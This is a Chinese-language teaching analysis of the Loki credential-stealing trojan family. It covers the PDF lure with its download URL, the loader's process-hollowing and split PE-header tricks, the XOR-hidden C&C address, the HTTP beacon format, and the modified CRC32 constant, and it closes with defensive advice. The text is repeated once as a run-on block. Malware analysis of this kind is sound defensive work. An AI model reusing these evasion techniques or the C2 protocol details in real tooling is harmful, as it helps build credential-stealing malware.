Loki窃密木马家族分析教学文档

一、Loki木马家族概述

Loki是一种窃密型恶意软件家族，主要通过PDF文件作为载体传播，专门窃取用户各类敏感信息。

主要特征

主要功能：窃取FTP、浏览器、邮件等软件的凭证信息
传播方式：通过社会工程学诱导用户下载恶意软件
技术特点：使用VB编写的loader，通过傀儡进程技术加载payload
数据收集：收集65种不同类型的用户凭证信息

与Fareit家族的比较

相同点：

都使用VB程序作为loader
loader代码结构相似，特别是PE头写入方式（分开写入"MZ"头）
窃密函数都以函数数组方式编程
通过注册表获取多数用户数据
使用stream流拼接窃取的数据

不同点：

通信协议：
- Fareit：复杂协议（aplib压缩+CRC32校验+两次RC4加密）
- Loki：明文传输（技术退步）
反分析技术：
- Fareit：使用花指令混淆代码
- Loki：混淆系统函数调用
校验算法：
- Fareit：标准CRC32
- Loki：修改过的CRC32
C&C地址存储：
- Fareit：明文硬编码
- Loki：加密存储

二、传播载体分析

PDF样本分析

样本哈希：973f20849613f197ff200f9bcd0fc7f5
表现形式：显示为一张图片和下载链接
实际行为：点击任何位置都会下载并执行恶意程序

嵌入的恶意链接：

http://194.88.105.202/~ninjagro/pdfs/QUOTATION.exe
其他两个隐藏链接（具体URL未明确）

三、JAR文件分析

功能特性

持久化：写入系统启动项
虚拟机检测：检查VM配置
进程监控：循环检测进程
资源监控：检测CPU使用情况
键盘记录：记录用户输入
屏幕截图：捕获用户屏幕
录音功能：录制用户音频

释放的恶意文件

WindowsPatch.exe：
- 命令行木马管理程序
- 功能：
  - 用户窗口管理
  - 文件系统属性设置
  - 显示器控制
  - Chrome密码窃取
p003.exe：
- 使用SmartAssembly混淆
- 主要功能：窃取Chrome保存的密码

四、EXE程序分析

Loader行为

内存中释放真正的恶意payload
使用傀儡进程技术加载执行
反检测技术：
- 分两次写入PE头（先写入除'M'外的部分，后补全'M'）
- 写入代码段
- 拷贝加密的C&C地址到payload
- 通过SetThreadContext恢复执行

五、Payload分析

主要功能

收集用户信息：
- 生成机器标识（示例：E1617E16F7D75B3218E38D668B82C1C0）
- 调用65个窃密函数获取各类凭证
注册表读取：
- 多数凭证通过读取注册表获取
- 包含一款国产浏览器信息（表明针对中国用户）

C&C通信机制

地址解密：
- 假地址：kbfvzoboss.bid/alien/fre.php（迷惑分析人员）
- 真地址：通过XOR 0xFF解密得到http://online-prodaja.rs/tz/Panel/five/fre.php

通信格式：

POST /tz/Panel/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: online-prodaja.rs
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary

User-Agent生成：
- 使用"KOSFKF"作为密钥解密
Content-Key生成：
- 使用自定义CRC32算法生成校验值
- 将校验值×2作为最终Content-Key
- 示例：B18BDBEE × 2 = 6317B7DC

自定义CRC32算法

修改标准CRC32的常量：
- 标准：0xEDB88320
- Loki使用：0xE8677835

持久化机制

XP系统：不添加启动项
Win7系统：在启动文件夹生成启动脚本

六、防御建议

用户防护：
- 不随意打开陌生人发送的PDF或文档
- 注意检查文件扩展名（如.pdf.exe是可疑的）
- 保持操作系统和软件更新
企业防护：
- 部署终端检测与响应(EDR)解决方案
- 监控异常网络连接（特别是到可疑域名的连接）
- 分析可疑进程的内存行为（特别是傀儡进程技术）
技术检测：
- 检测分次写入PE头的行为
- 监控SetThreadContext的异常使用
- 识别自定义CRC32算法特征
- 检测大量注册表读取行为

七、总结

Loki木马家族虽然在某些技术方面（如通信协议）相比Fareit有所退步，但在以下方面有所提升：

C&C地址隐藏技术
反分析手段
窃取信息种类和数量
针对中国用户的特定攻击

这反映了恶意软件作者不断调整策略以适应安全环境的变化，同时表明中国网民已成为重要攻击目标。

Loki窃密木马家族分析教学文档一、Loki木马家族概述 Loki是一种窃密型恶意软件家族，主要通过PDF文件作为载体传播，专门窃取用户各类敏感信息。主要特征主要功能：窃取FTP、浏览器、邮件等软件的凭证信息传播方式：通过社会工程学诱导用户下载恶意软件技术特点：使用VB编写的loader，通过傀儡进程技术加载payload 数据收集：收集65种不同类型的用户凭证信息与Fareit家族的比较相同点：都使用VB程序作为loader loader代码结构相似，特别是PE头写入方式（分开写入"MZ"头）窃密函数都以函数数组方式编程通过注册表获取多数用户数据使用stream流拼接窃取的数据不同点：通信协议： Fareit：复杂协议（aplib压缩+CRC32校验+两次RC4加密） Loki：明文传输（技术退步）反分析技术： Fareit：使用花指令混淆代码 Loki：混淆系统函数调用校验算法： Fareit：标准CRC32 Loki：修改过的CRC32 C&C地址存储： Fareit：明文硬编码 Loki：加密存储二、传播载体分析 PDF样本分析样本哈希：973f20849613f197ff200f9bcd0fc7f5 表现形式：显示为一张图片和下载链接实际行为：点击任何位置都会下载并执行恶意程序嵌入的恶意链接： http://194.88.105.202/~ninjagro/pdfs/QUOTATION.exe 其他两个隐藏链接（具体URL未明确）三、JAR文件分析功能特性持久化：写入系统启动项虚拟机检测：检查VM配置进程监控：循环检测进程资源监控：检测CPU使用情况键盘记录：记录用户输入屏幕截图：捕获用户屏幕录音功能：录制用户音频释放的恶意文件 WindowsPatch.exe ：命令行木马管理程序功能：用户窗口管理文件系统属性设置显示器控制 Chrome密码窃取 p003.exe ：使用SmartAssembly混淆主要功能：窃取Chrome保存的密码四、EXE程序分析 Loader行为内存中释放真正的恶意payload 使用傀儡进程技术加载执行反检测技术：分两次写入PE头（先写入除'M'外的部分，后补全'M'）写入代码段拷贝加密的C&C地址到payload 通过SetThreadContext恢复执行五、Payload分析主要功能收集用户信息：生成机器标识（示例：E1617E16F7D75B3218E38D668B82C1C0）调用65个窃密函数获取各类凭证注册表读取：多数凭证通过读取注册表获取包含一款国产浏览器信息（表明针对中国用户） C&C通信机制地址解密：假地址：kbfvzoboss.bid/alien/fre.php（迷惑分析人员）真地址：通过XOR 0xFF解密得到http://online-prodaja.rs/tz/Panel/five/fre.php 通信格式： User-Agent生成：使用"KOSFKF"作为密钥解密 Content-Key生成：使用自定义CRC32算法生成校验值将校验值×2作为最终Content-Key 示例：B18BDBEE × 2 = 6317B7DC 自定义CRC32算法修改标准CRC32的常量：标准：0xEDB88320 Loki使用：0xE8677835 持久化机制 XP系统：不添加启动项 Win7系统：在启动文件夹生成启动脚本六、防御建议用户防护：不随意打开陌生人发送的PDF或文档注意检查文件扩展名（如.pdf.exe是可疑的）保持操作系统和软件更新企业防护：部署终端检测与响应(EDR)解决方案监控异常网络连接（特别是到可疑域名的连接）分析可疑进程的内存行为（特别是傀儡进程技术）技术检测：检测分次写入PE头的行为监控SetThreadContext的异常使用识别自定义CRC32算法特征检测大量注册表读取行为七、总结 Loki木马家族虽然在某些技术方面（如通信协议）相比Fareit有所退步，但在以下方面有所提升： C&C地址隐藏技术反分析手段窃取信息种类和数量针对中国用户的特定攻击这反映了恶意软件作者不断调整策略以适应安全环境的变化，同时表明中国网民已成为重要攻击目标。